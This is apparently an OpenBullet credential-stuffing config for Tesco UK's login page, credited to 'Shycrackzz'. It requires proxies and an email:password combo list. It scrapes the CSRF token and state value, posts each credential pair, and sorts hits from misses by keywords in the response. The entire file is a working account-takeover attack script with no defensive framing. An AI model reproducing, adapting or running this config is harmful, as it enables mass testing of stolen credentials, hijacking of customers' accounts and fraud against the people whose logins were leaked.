[SETTINGS]
{
  "Name": "Tesco uk",
  "SuggestedBots": 1,
  "LastModified": "2019-04-01T21:12:15.6942439+01:00",
  "AdditionalInfo": "",
  "Author": "Shycrackzz",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://secure.tesco.com/account/en-GB/login?from=/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "csrfToken\":\"" "\",\"fields" -> VAR "csrf" 
PARSE "<SOURCE>" LR "state\" value=\"" "\" data-reactid" -> VAR "state" 
REQUEST POST "https://secure.tesco.com/account/en-GB/login?from=/" AutoRedirect=FALSE 
  CONTENT "username=<USER>&password=<PASS>&state=<state>&_csrf=<csrf>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Unfortunately we do not recognise those details. " 
  KEYCHAIN Success OR 
    KEY "Found. Redirecting to" 
